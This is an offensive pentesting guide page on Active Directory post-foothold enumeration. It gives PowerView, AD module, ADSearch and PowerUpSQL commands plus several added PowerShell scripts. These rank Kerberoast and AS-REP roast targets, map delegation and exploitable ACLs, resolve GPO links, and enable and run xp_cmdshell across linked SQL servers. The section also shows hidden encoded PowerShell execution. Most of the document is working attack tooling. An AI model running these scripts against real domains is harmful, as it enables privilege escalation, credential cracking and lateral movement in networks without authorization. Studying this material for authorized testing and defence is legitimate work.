The Pentesting Guide
Active Directory

Introduction

Once the attacker has obtained a foothold on a computer inside an Active Directory network, the next step is to understand how the domain is built: the users, groups, computers, OUs, GPOs and ACLs, and the relationships between them.

In this phase, the attacker should be focused on enumerating information that can be further used to elevate privileges or perform lateral movements.

Domain

General Information

  • Get current domain

Get-Domain [-Domain <DIFFERENT_DOMAIN>]
Get-ADDomain [-Identity <DOMAIN>]
  • Get current domain controller

Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | select Forest, Name, OSVersion | fl 
Get-ADDomainController [-DomainName <DOMAIN>] [-Discover]
  • Get domain policy data (password, lockout and Kerberos policy)

Get-DomainPolicyData [-Domain <DIFFERENT_DOMAIN>]
Get-ADDefaultDomainPasswordPolicy [-Identity <DOMAIN>]

Forest

  • Return the forest object

Get-Forest [-Forest <FOREST>]
Get-ADForest [-Identity <FOREST>]
  • Get all domains from your current forest

Get-ForestDomain [-Forest <FOREST>]
Get-ADForest [-Identity <FOREST>] | fl Domains
  • Get the Global Catalogs of the forest

Get-ForestGlobalCatalog [-Forest <FOREST>]
Get-ADForest | select -ExpandProperty GlobalCatalogs

Trust

  • Return all domain trusts for the current or specified domain

Get-DomainTrust [-Domain <DomainName>]
Get-ADTrust {-Filter * | -Identity "<Domain>"}
nltest /domain_trusts
  • Enumerate all trusts for the current domain, then recursively all trusts for each domain found

Get-DomainTrustMapping
  • Return all forest trusts for the current forest or a specified forest.

Get-ForestTrust [-Forest "<FOREST>"]
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

Users

General Information

  • Obtain users

Get-DomainUser -Identity <USERNAME> [-Properties DisplayName, MemberOf | fl]
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname
Get-ADUser -Filter * | ?{ $_.Enabled -eq $true } | Select SamAccountName
# Detailed information about a user
Get-ADUser -Identity <USERNAME> -Properties *
.\ADSearch.exe --search "objectCategory=user"
  • Built-in accounts

Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name, Description
  • Get group memberships

Get-DomainGroup -UserName "<USERNAME>"
Get-ADPrincipalGroupMembership -Identity "<USERNAME>"
  • Get each user's logon count and the last time the password was set

Get-ADUser -Filter * -Properties logoncount,pwdlastset | select name, logoncount, @{Name='PwdLastSet'; Expression={[datetime]::FromFileTime($_.pwdlastset)}}
  • Find domain machines where members of a given group (default: Domain Admins) or a specific user are logged in

Find-DomainUserLocation -Verbose [-CheckAccess] [{-UserGroupIdentity|-UserIdentity} <Identity>]

Security

  • Kerberoast

Get-DomainUser -SPN | select serviceprincipalname
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
.\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName
  • AS-REP roast

Get-DomainUser -PreauthNotRequired -Verbose
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True } -Properties DoesNotRequirePreAuth | select UserPrincipalName
  • Search passwords on the description attribute

Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name, Description
  • Find machines where the current user has local administrator rights

Find-LocalAdminAccess
  • Users configured for constrained delegation (msDS-AllowedToDelegateTo set)

Get-NetUser -TrustedToAuth
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
.\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
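
Added example (not part of the original page): instead of listing SPN accounts and pre-auth-less accounts separately, this ActiveDirectory-module script returns Kerberoast and AS-REP roast candidates in one table, tagged with adminCount (1 means the account is protected by AdminSDHolder, i.e. privileged) and password age, so the targets worth the cracking time sort first. It assumes the RSAT ActiveDirectory module in a domain-joined context; the function names are the example's own.

```powershell
# Added example, not from the original page. Assumes the ActiveDirectory module.
Import-Module ActiveDirectory

# userAccountControl bit masks used in the LDAP matching-rule filters below
$UAC_ACCOUNTDISABLE   = 2
$UAC_DONT_REQ_PREAUTH = 4194304

function New-RoastRecord {
    # Flatten one AD user into a row that is easy to sort and read
    param($User, [string]$Type)
    # pwdLastSet is a FILETIME; 0 means "must change at next logon" / never set
    $pwdSet = if ($User.pwdLastSet -gt 0) { [datetime]::FromFileTime($User.pwdLastSet) } else { $null }
    [pscustomobject]@{
        Type           = $Type
        SamAccountName = $User.SamAccountName
        AdminCount     = [int]($User.adminCount -eq 1)     # 1 = AdminSDHolder-protected (privileged)
        PwdLastSet     = $pwdSet
        PwdAgeDays     = if ($pwdSet) { [int]((Get-Date) - $pwdSet).TotalDays } else { -1 }
        Groups         = ($User.memberOf | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' }) -join ';'
        SPNs           = ($User.servicePrincipalName -join ';')
    }
}

function Get-RoastableAccount {
    # Returns one row per roastable account, privileged and stale passwords first
    param([string]$Server)   # optional DC or domain to query

    $common = @{ Properties = 'servicePrincipalName','pwdLastSet','adminCount','memberOf','userAccountControl' }
    if ($Server) { $common['Server'] = $Server }

    # Kerberoast: enabled accounts with an SPN. krbtgt is excluded: its hash is not
    # realistically crackable and requesting its TGS is noisy.
    $kerb = Get-ADUser -LDAPFilter "(&(servicePrincipalName=*)(!(sAMAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=$UAC_ACCOUNTDISABLE)))" @common |
        ForEach-Object { New-RoastRecord -User $_ -Type 'Kerberoast' }

    # AS-REP roast: enabled accounts with "Do not require Kerberos preauthentication"
    $asrep = Get-ADUser -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=$UAC_DONT_REQ_PREAUTH)(!(userAccountControl:1.2.840.113556.1.4.803:=$UAC_ACCOUNTDISABLE)))" @common |
        ForEach-Object { New-RoastRecord -User $_ -Type 'AS-REP' }

    @($kerb) + @($asrep) |
        Sort-Object -Property @{Expression='AdminCount'; Descending=$true}, @{Expression='PwdAgeDays'; Descending=$true}
}

# Usage:
# Get-RoastableAccount | Format-Table Type, SamAccountName, AdminCount, PwdAgeDays, Groups -AutoSize
```

A PwdAgeDays of -1 means pwdLastSet is 0; those accounts are usually freshly created or forced to change at next logon, so their ticket is rarely worth cracking.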

Groups

  • List all the groups in the current domain

Get-DomainGroup [| where Name -like "*Admins*" | select SamAccountName]
Get-ADGroup -Filter * | select name
# More detailed version
Get-ADGroup -Filter * -Properties *
# Admin Groups
.\ADSearch.exe --search "(&(objectCategory=group)(cn=*Admins))" [--attributes cn,member]
# MSSQL Groups
.\ADSearch.exe --search "(&(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member
  • List all the members in a specific group:

Get-DomainGroupMember -Identity "Domain Admins" [| select MemberDistinguishedName]	
Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select-Object SamAccountName
  • List groups of a user

Get-ADPrincipalGroupMembership <USER> 
  • Find the machines where a group is granted membership of a local group (e.g. Administrators) through GPO (Restricted Groups / Group Policy Preferences)

Get-DomainGPOUserLocalGroupMapping [-Identity "<GROUP_NAME>" | -LocalGroup Administrators] | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl

Computers

General information

  • List computers

Get-NetComputer [| select samaccountname, DnsHostName, operatingsystem]
Get-DomainComputer -OperatingSystem "*Server 2016*"

# Get Name, IP and Operating System
Get-NetComputer  -Properties name,dnshostname, OperatingSystem | ForEach-Object { $_ | Add-Member -NotePropertyName IPAddressV4 -NotePropertyValue (Resolve-DnsName -Type A -Name $_.dnshostname).IPAddress -Force; $_  } | Select-object -Property name,dnshostname,IPAddressV4, OperatingSystem | Format-Table -AutoSize
Get-AdComputer -Filter * | select Name
  • Return PCs that can be pinged

Get-NetComputer -Ping
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName | fl Address,IPV4Address,IPV6Address,ResponseTime} 
  • Get users logged on to a remote machine (requires local admin on the target)

Get-NetLoggedon -ComputerName "<COMPUTER_NAME>" | Select Username
  • Get users with a loaded profile on a remote machine, read from HKEY_USERS through the remote registry

Get-LoggedonLocal -ComputerName "<HOSTNAME>"
  • Enumerate local groups on a machine (requires admin privileges)

Get-NetLocalGroup -ComputerName "<HOSTNAME>"
# Get the members of Local Groups
Get-NetLocalGroupMember -ComputerName "<HOSTNAME>" -GroupName "<GROUP_NAME>"
  • Return the last user who logged onto the machine (requires administrative rights and the remote registry service enabled on the target)

Get-LastLoggedOn -ComputerName <HOSTNAME>

Security

  • Enumerate all ACEs on domain computer objects whose trustee is the current user (this matches the user identity only, not rights held through group membership)

Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_ | Select-object -Property ObjectDN,ActiveDirectoryRights, AceType,ObjectAceType, Identity |  Format-List}}
  • Computers with unconstrained delegation (TRUSTED_FOR_DELEGATION, userAccountControl bit 0x80000 = 524288). Domain controllers have it by default, so the AD module query keeps only members of Domain Computers (primaryGroupID 515) to leave DCs out

Get-DomainComputer -UnConstrained | select samaccountname
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description
.\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
  • Computers with constrained delegation (msDS-AllowedToDelegateTo set); the useraccountcontrol value tells whether TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition) is also set

Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto,useraccountcontrol | fl
Get-NetComputer | where-object {$_."msds-allowedtodelegateto" -ne $null} | select name, msds-allowedtodelegateto, useraccountcontrol | fl
Get-NetComputer <COMPUTER_NAME> | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
.\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
  • Resource-based constrained delegation: a principal with WriteProperty, GenericAll, GenericWrite or WriteDacl on a computer object can write its msDS-AllowedToActOnBehalfOfOtherIdentity attribute. Find computer objects where a non-default domain principal (RID of four or more digits, i.e. not a built-in account or group) holds such a right:

$DomainSID = Get-DomainSID
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "^$DomainSID-[\d]{4,10}$" }
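
Added example, not from the original page: one pass over all computer accounts that labels each host as unconstrained (DCs marked as expected), constrained with or without protocol transition (the TRUSTED_TO_AUTH_FOR_DELEGATION bit decides whether the host can S4U2Self any user or only forward tickets users actually presented), or an RBCD target, and decodes msDS-AllowedToActOnBehalfOfOtherIdentity into readable principals instead of a raw security descriptor. Assumes the ActiveDirectory module; function names are the example's own.

```powershell
# Added example, not from the original page. Assumes the ActiveDirectory module.
Import-Module ActiveDirectory

$TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained + protocol transition
$RID_DOMAIN_CONTROLLERS         = 516        # primaryGroupID of domain controllers

function ConvertFrom-RbcdDescriptor {
    # msDS-AllowedToActOnBehalfOfOtherIdentity is a security descriptor. The AD module
    # normally returns it as ActiveDirectorySecurity; raw LDAP readers get a byte[].
    param($Value)
    if ($null -eq $Value) { return @() }
    $sd = $Value
    if ($Value -is [byte[]]) {
        $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $sd.SetSecurityDescriptorBinaryForm($Value)
    }
    # Ask for SIDs so unresolvable trustees (deleted accounts, foreign domains) still show up
    $sd.GetAccessRules($true, $false, [System.Security.Principal.SecurityIdentifier]) |
        ForEach-Object {
            $sid = $_.IdentityReference
            try { "$($sid.Translate([System.Security.Principal.NTAccount])) ($sid)" } catch { "$sid" }
        }
}

function Get-DelegationSummary {
    param([string]$Server)   # optional DC or domain to query
    $ldap = "(|(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION)" +
            "(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_TO_AUTH_FOR_DELEGATION)" +
            "(msDS-AllowedToDelegateTo=*)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))"
    $query = @{
        LDAPFilter = $ldap
        Properties = 'userAccountControl','msDS-AllowedToDelegateTo','msDS-AllowedToActOnBehalfOfOtherIdentity','primaryGroupID','operatingSystem'
    }
    if ($Server) { $query['Server'] = $Server }

    Get-ADComputer @query | ForEach-Object {
        $uac   = [int]$_.userAccountControl
        $kinds = @()

        # DCs are unconstrained by design; flag them separately so they do not drown real findings
        if ($uac -band $TRUSTED_FOR_DELEGATION) {
            $k = if ($_.primaryGroupID -eq $RID_DOMAIN_CONTROLLERS) { 'Unconstrained (DC, expected)' } else { 'Unconstrained' }
            $kinds += $k
        }
        $allowedTo = @($_.'msDS-AllowedToDelegateTo')
        if ($allowedTo.Count -gt 0) {
            # With T2A4D the host can S4U2Self any user (protocol transition);
            # without it, it can only forward tickets users actually presented (Kerberos only)
            $k = if ($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION) { 'Constrained (protocol transition)' } else { 'Constrained (Kerberos only)' }
            $kinds += $k
        }
        $rbcd = @(ConvertFrom-RbcdDescriptor $_.'msDS-AllowedToActOnBehalfOfOtherIdentity')
        if ($rbcd.Count -gt 0) { $kinds += 'RBCD target' }

        [pscustomobject]@{
            Name        = $_.Name
            OS          = $_.operatingSystem
            Delegation  = $kinds -join ', '
            AllowedTo   = $allowedTo -join ';'    # SPNs this host may delegate to
            ActOnBehalf = $rbcd -join ';'         # principals allowed to impersonate users to this host
        }
    }
}

# Usage: Get-DelegationSummary | Format-List
```

Hosts that come back as "Constrained (Kerberos only)" still matter: without the T2A4D bit you cannot S4U2Self an arbitrary user from the host itself, but a ticket forwarded by a real user session can still be abused.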

Group Policies Objects (GPO)s

General information

  • Get list of GPO in current domain.

Get-DomainGPO [-ComputerIdentity <COMPUTER_NAME>] -Properties DisplayName | sort -Property DisplayName
  • Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences:

Get-DomainGPOLocalGroup [-ComputerIdentity <COMPUTER_NAME>] | select GPODisplayName, GroupName
  • Enumerates the machines where a specific domain user/group is a member of a specific local group (Useful for finding where domain groups have local admin access):

Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
  • Finds what users/groups are in the specified local group for a target machine through GPO correlation

Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity "<HOSTNAME>"

Get Modifiable GPOs

  • GPOs where a non-default domain principal (RID of four or more digits) can create child objects or write properties:

$DomainSID = Get-DomainSID
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty|GenericWrite|GenericAll" -and $_.SecurityIdentifier -match "^$DomainSID-[\d]{4,10}$" }
  • Principals with the "Create groupPolicyContainer objects" right on the Policies container (they can create new GPOs; linking them to an OU still needs write rights on that OU's gPLink):

Get-DomainObjectAcl -Identity "CN=Policies,CN=System,<DOMAIN_DN>" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -match "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

Organizational Units (OU)

  • Get Domain Organizational Units:

Get-DomainOU [-Properties Name | sort -Property Name]
Get-ADOrganizationalUnit -Filter * -Properties *
  • Get the GPOs linked to an OU: the OU's gplink attribute (returned by Get-DomainOU) lists the linked GPOs by GUID; resolve each with

Get-DomainGPO -Identity "<GPLink_RelativeCN>"
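
Added example (not from the page): parsing gPLink yourself shows not just which GPOs are linked to an OU but their link order and whether each link is enforced or disabled, and the reverse lookup finds every container (domain root, OUs, sites) a GPO is linked to, which is what decides whether a modifiable GPO is worth anything. Assumes the ActiveDirectory module; function names and the GUID in the comment are the example's own.

```powershell
# Added example, not from the original page. Assumes the ActiveDirectory module.
Import-Module ActiveDirectory

function ConvertFrom-GPLink {
    # gPLink looks like: [LDAP://cn={GUID},cn=policies,cn=system,DC=x,DC=y;0][LDAP://...;2]
    # link options: 0 = normal, 1 = link disabled, 2 = enforced, 3 = enforced and disabled
    param([string]$GPLink)
    if ([string]::IsNullOrWhiteSpace($GPLink)) { return @() }
    $order = 0
    foreach ($m in [regex]::Matches($GPLink, '(?i)\[LDAP://cn=(\{[0-9a-f-]+\})[^;]*;(\d)\]')) {
        $order++
        $opt = [int]$m.Groups[2].Value
        [pscustomobject]@{
            Order    = $order                  # position in the link list on this container
            Guid     = $m.Groups[1].Value
            Enforced = [bool]($opt -band 2)
            Disabled = [bool]($opt -band 1)
        }
    }
}

function Get-OUGpoLinks {
    # Which GPOs are linked to this OU (or the domain root), with their link options
    param([Parameter(Mandatory)][string]$DistinguishedName)
    $container = Get-ADObject -Identity $DistinguishedName -Properties gPLink
    ConvertFrom-GPLink $container.gPLink | ForEach-Object {
        $gpo = Get-ADObject -LDAPFilter "(&(objectClass=groupPolicyContainer)(cn=$($_.Guid)))" -Properties displayName
        $_ | Add-Member -NotePropertyName DisplayName -NotePropertyValue $gpo.displayName -PassThru
    }
}

function Get-GpoLinkTargets {
    # Reverse lookup: every OU, the domain root and every site whose gPLink references this GPO
    param([Parameter(Mandatory)][string]$GpoGuid)   # e.g. '{31B2F340-016D-11D2-945F-00C04FB984F9}' (Default Domain Policy)
    $root  = Get-ADRootDSE
    # OUs and the domain root live in the domain partition; site links live in the configuration partition
    $bases = @($root.defaultNamingContext, "CN=Sites,$($root.configurationNamingContext)")
    foreach ($base in $bases) {
        Get-ADObject -SearchBase $base -LDAPFilter "(gPLink=*$GpoGuid*)" -Properties gPLink |
            ForEach-Object {
                $dn = $_.DistinguishedName
                ConvertFrom-GPLink $_.gPLink | Where-Object { $_.Guid -ieq $GpoGuid } |
                    Select-Object @{n='LinkedAt'; e={$dn}}, Enforced, Disabled, Order
            }
    }
}

# Usage:
# Get-OUGpoLinks -DistinguishedName 'OU=Workstations,<DOMAIN_DN>' | Format-Table
# Get-GpoLinkTargets -GpoGuid '{<GPO_GUID>}' | Format-Table
```

A modifiable GPO that Get-GpoLinkTargets shows as linked nowhere (or only with Disabled = True) gives you nothing until you also have rights to link it; one linked at the domain root, enforced, reaches every computer.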

Access Control Lists (ACL)s

  • Return the ACL of a specific AD object (Get-ObjectAcl is the old PowerView name for Get-DomainObjectAcl)

Get-ObjectAcl -SamAccountName "<USER>" -ResolveGUIDs
Get-DomainObjectAcl -ResolveGUIDs -SamAccountName "<USERNAME>"
(Get-Acl 'AD:\CN=Administrator,CN=Users,<DOMAIN_DN>').Access
  • Find interesting object ACLs in the current domain (modify rights such as GenericAll, write/create/delete rights or extended rights, held by non-default principals)

Find-InterestingDomainAcl -ResolveGUIDs
  • Filter those results to a specific group, e.g. what the RDPUsers group can modify

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
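
Added example, not from the page: the computer ACE one-liner in the Computers section only matches ACEs whose trustee is DOMAIN\user, while in practice rights are held through groups. This walks every SID in the current process token (the user plus all group SIDs, nested and well-known ones included) and reports ACEs on the chosen objects granted to any of them, using the AD module's AD: drive. The token reflects group membership at logon time, so log on again after being added to a group. The well-known GUID table (a handful of schema and extended-right GUIDs, assumed accurate) and the function names are the example's own.

```powershell
# Added example, not from the original page. Assumes the ActiveDirectory module (AD: drive).
Import-Module ActiveDirectory

# A few well-known schema / extended-right GUIDs worth naming in the output;
# anything else is printed as the raw GUID.
$KnownGuids = @{
    '00000000-0000-0000-0000-000000000000' = 'All'
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '3f78c3e5-f79a-46bd-a0b8-9d18116ddc79' = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member'
    'f3a64788-5306-11d1-a9c5-0000f80367c1' = 'servicePrincipalName'
}
$InterestingRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight|Self'

function Get-TokenSid {
    # Every SID the current process token carries: the user plus all group SIDs
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Find-TokenAce {
    param(
        [string[]]$Sids = (Get-TokenSid),
        [string]$LDAPFilter = '(objectCategory=computer)'   # swap for users, groups or OUs as needed
    )
    $sidSet = [System.Collections.Generic.HashSet[string]]::new([string[]]$Sids, [System.StringComparer]::OrdinalIgnoreCase)

    Get-ADObject -LDAPFilter $LDAPFilter | ForEach-Object {
        $dn  = $_.DistinguishedName
        $acl = Get-Acl -Path "AD:\$dn"
        # Ask for SIDs directly so matching never depends on resolving trustee names
        $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $sidSet.Contains($_.IdentityReference.Value) -and
                ($_.ActiveDirectoryRights.ToString() -match $InterestingRights)
            } | ForEach-Object {
                $ot = $_.ObjectType.ToString()
                [pscustomobject]@{
                    ObjectDN   = $dn
                    Trustee    = $_.IdentityReference.Value
                    Rights     = $_.ActiveDirectoryRights.ToString()
                    ObjectType = if ($KnownGuids.ContainsKey($ot)) { $KnownGuids[$ot] } else { $ot }
                    Inherited  = $_.IsInherited
                }
            }
    }
}

# Usage: Find-TokenAce | Format-Table -AutoSize
```

Read WriteProperty together with ObjectType: WriteProperty on "All" is as good as GenericWrite, while WriteProperty on a single attribute such as member or msDS-AllowedToActOnBehalfOfOtherIdentity is narrower but often enough for a group-add or RBCD attack.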

Shares

  • Enumerate shares on domain hosts (-CheckShareAccess keeps only the shares the current user can read)

Find-DomainShare
Find-DomainShare -CheckShareAccess
  • Find shares on hosts in the current domain (old PowerView name)

Invoke-ShareFinder -Verbose
  • Get all fileservers of the domain

Get-NetFileServer
  • Searches for files matching specific criteria on readable shares in the domain

Invoke-FileFinder -Verbose

MSSQL

General information

  • Discover Active Directory Domain SQL Server Instances

Get-SQLInstanceDomain
  • Tests if the current Windows account or provided SQL Server login can log into an SQL Server.

Get-SQLConnectionTest -Instance "<HOSTNAME,PORT>" | fl
# If there are several instances use the following one-liner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
  • Returns basic server and user information from target SQL Servers.

Get-SQLServerInfo -Instance "<HOSTNAME,PORT>"

Links

  • Look for links to remote servers

Get-SQLServerLink -Verbose -Instance "<HOSTNAME,PORT>" 
select * from master..sysservers
  • Enumerate and follow MSSQL database links

Get-SQLServerLinkCrawl -Verbose -Instance "<HOSTNAME,PORT>" 

Perform Queries

  • Perform queries

Get-SQLQuery -Instance "<HOSTNAME,PORT>" -Query "select @@servername"
  • Perform queries through a linked server (OPENQUERY; single quotes inside the inner query must be doubled)

SELECT * FROM OPENQUERY("<LINKED_SERVER>", 'select @@servername');

CMDShell

  • Check if xp_cmdshell is enabled (value_in_use = 1)

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'
  • Enable xp_cmdshell (requires sysadmin)

sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
  • Execute commands

EXEC xp_cmdshell 'powershell -w hidden -enc <ENCODED_COMMAND>';
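
Added example, not from the original page: before crawling links, check per link whether it can actually be turned into command execution. OPENQUERY passes a query through and returns its rowset, which is enough to probe the far side and to call xp_cmdshell once it is on; turning xp_cmdshell on remotely is done with EXECUTE ('...') AT [link], which requires RPC Out to be enabled on the link, and the link login must be sysadmin there. The script uses PowerUpSQL's Get-SQLQuery (listed under Tools); the instance and link names in the usage lines are placeholders and the function names are the example's own.

```powershell
# Added example, not from the original page. Uses PowerUpSQL's Get-SQLQuery
# (Import-Module PowerUpSQL, or dot-source PowerUpSQL.ps1).
Import-Module PowerUpSQL

function Get-SqlLinkCapability {
    # For every linked server on $Instance: can we reach it, who are we there,
    # is xp_cmdshell already on, and is RPC Out enabled (needed for EXECUTE ... AT)?
    param([Parameter(Mandatory)][string]$Instance)

    # sys.servers holds the link definitions and the two flags that matter
    $links = Get-SQLQuery -Instance $Instance -Query 'SELECT name, data_source, is_rpc_out_enabled, is_data_access_enabled FROM sys.servers WHERE is_linked = 1'
    foreach ($l in $links) {
        $remoteLogin = $null; $remoteSysadmin = $null; $remoteXpCmdShell = $null
        if ([bool]$l.is_data_access_enabled) {
            # Probe the far side through OPENQUERY. Inner quotes are doubled because
            # OPENQUERY takes the remote query as a string literal.
            $q = "SELECT * FROM OPENQUERY([$($l.name)], 'SELECT SYSTEM_USER AS login, IS_SRVROLEMEMBER(''sysadmin'') AS sa, " +
                 "(SELECT CAST(value_in_use AS int) FROM sys.configurations WHERE name = ''xp_cmdshell'') AS xp')"
            $r = Get-SQLQuery -Instance $Instance -Query $q
            if ($r) {
                $remoteLogin      = $r.login
                $remoteSysadmin   = [bool]$r.sa
                $remoteXpCmdShell = [bool]$r.xp
            }
        }
        $rpcOut = [bool]$l.is_rpc_out_enabled
        [pscustomobject]@{
            Instance       = $Instance
            Link           = $l.name
            RemoteServer   = $l.data_source
            DataAccess     = [bool]$l.is_data_access_enabled
            RpcOut         = $rpcOut
            RemoteLogin    = $remoteLogin
            RemoteSysadmin = $remoteSysadmin
            XpCmdShellOn   = $remoteXpCmdShell
            # Code execution is reachable if we are sysadmin there and either xp_cmdshell
            # is already on (callable via OPENQUERY) or RPC Out lets us enable it with EXECUTE AT
            CanGetExec     = ($remoteSysadmin -eq $true) -and ($rpcOut -or ($remoteXpCmdShell -eq $true))
        }
    }
}

function Invoke-SqlCmdShellViaLink {
    # Enable and use xp_cmdshell on the far side of a link (needs RPC Out and sysadmin there)
    param([Parameter(Mandatory)][string]$Instance,
          [Parameter(Mandatory)][string]$Link,
          [Parameter(Mandatory)][string]$Command)
    # The command sits inside a string literal inside another string literal,
    # so every single quote in it must be quadrupled
    $cmd = $Command -replace "'", "''''"
    Get-SQLQuery -Instance $Instance -Query "EXECUTE ('sp_configure ''show advanced options'',1; RECONFIGURE; sp_configure ''xp_cmdshell'',1; RECONFIGURE;') AT [$Link]" | Out-Null
    Get-SQLQuery -Instance $Instance -Query "EXECUTE ('xp_cmdshell ''$cmd''') AT [$Link]"
}

# Usage:
# Get-SqlLinkCapability -Instance '<HOSTNAME,PORT>' | Format-Table -AutoSize
# Invoke-SqlCmdShellViaLink -Instance '<HOSTNAME,PORT>' -Link '<LINKED_SERVER>' -Command 'whoami'
```

Get-SqlLinkCapability can be chained over the accessible instances from Get-SQLInstanceDomain, and a link that reports sysadmin but neither RpcOut nor XpCmdShellOn is a dead end for execution until one of those changes.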

Tools

  • LinWinPwn: automates a number of Active Directory enumeration and vulnerability checks.
  • PowerView: PowerShell tool to gain network situational awareness on Windows domains.
  • ADSearch: perform LDAP queries.
  • PowerUpSQL: module that includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation at scale, and post-exploitation actions such as OS command execution.
  • ADModule: the Active Directory module for Windows PowerShell.

References

  • AD Enumeration Toolkit
  • Bloodhound docs
  • PowerView (HackTricks)
  • Red Team Ops

Exploitation of the delegation settings enumerated above is covered on the separate pages Unconstrained Delegation, Constrained Delegation and Resource-Based Constrained Delegation (GenericWrite to Computer).

Note: to obtain a GPO's display name from its GUID, use Get-GPO -Guid "{...}" (GroupPolicy module).